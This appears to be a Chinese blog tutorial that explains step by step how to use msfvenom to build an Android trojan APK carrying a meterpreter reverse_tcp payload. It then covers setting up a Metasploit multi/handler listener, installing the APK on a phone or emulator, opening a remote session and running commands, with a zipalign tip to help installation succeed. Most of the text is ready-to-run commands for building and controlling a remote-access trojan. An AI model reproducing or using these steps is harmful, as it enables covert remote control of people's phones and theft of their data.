Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程序掃描,社會工程。團隊合作,在Metasploit和綜合報告提出了他們的發現。
環境准備:
Kali2.0(msfVENOM、metasploit)
安卓手機或安卓模擬器
利用過程:
先查看本地IP地址
使用msfvenom生成apk木馬
1
|
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk
|
注釋:
LHOST = 接收反彈連接主機
LPORT = 接收反彈連接主機的監聽端口
172.16.105.184修改為本地的IP地址 5555是生成的端口號/root/apk.apk是生成的APK路徑
如顯示下圖所示說明生成成功!
啟動msfconsole
輸入命令:
1
|
msfconsole
|
然后執行以下命令
1
2
3
|
use exploit/multi/handler //加載模塊
set payload android/meterpreter/reverse_tcp //選擇Payload
show options //查看參數設置
|
這個payload里邊有兩個參數要設置
LHOST和LPORT 表示地址和端口 默認的端口是4444 現在我們來更改設置
1
2
3
|
set LHOST 172.16.105.184 //這里的地址設置成我們剛才生成木馬的IP地址
set LPORT 5555 //這里的端口設置成剛才我們生成木馬所監聽的端口
|
配置完成后我們可以執行
1
|
show options //查看是否配置成功
|
最后我們把生成后的APK文件安裝到模擬器或者手機中然后執行
1
|
exploit //開始執行漏洞 開始監聽,等待手機上線
|
我們可以發現有一個ID與本機處於連接狀態,現在我們可以執行
1
2
|
sessions //查看連接狀態
sessions 1 //建立與ID值位1的主機連接
|
現在我們可以執行
1
|
sysinfo
|
更多命令參數可以使用help命令查看
PS:如果在操作過程中有什么不懂的或遇到什么問題可以在文章下方留言小殘看到后悔第一時間為大家解答
如果遇到部分手機會無法安裝生成后發APK文件那么我們可以zipalign工具優化處理
1
|
zipalign -v 4 apk.apk napk1.apk
|
標簽:
漏洞